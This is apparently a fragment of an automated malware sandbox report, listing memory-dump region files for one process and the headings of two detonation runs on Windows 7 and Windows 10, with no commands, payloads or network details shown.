memory/1228-371-0x00007FFA85390000-0x00007FFA858B9000-memory.dmp
memory/1228-370-0x00007FFA9B530000-0x00007FFA9B549000-memory.dmp
memory/1228-369-0x00007FFA858C0000-0x00007FFA85A3E000-memory.dmp
memory/1228-368-0x00007FFA942D0000-0x00007FFA942F3000-memory.dmp
memory/1228-367-0x00007FFA94D30000-0x00007FFA94D49000-memory.dmp
memory/1228-366-0x00007FFA94D50000-0x00007FFA94D7D000-memory.dmp
memory/1228-365-0x00007FFA9E280000-0x00007FFA9E28F000-memory.dmp
memory/1228-364-0x00007FFA957A0000-0x00007FFA957C4000-memory.dmp
memory/1228-363-0x00007FFA95010000-0x00007FFA9501D000-memory.dmp
memory/1228-362-0x00007FFA86000000-0x00007FFA8611C000-memory.dmp
memory/1228-361-0x00007FFA94D20000-0x00007FFA94D2D000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-23 07:24
Reported
2024-06-23 07:25
Platform
win7-20240220-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-23 07:24
Reported
2024-06-23 07:25
Platform
win10v2004-20240508-en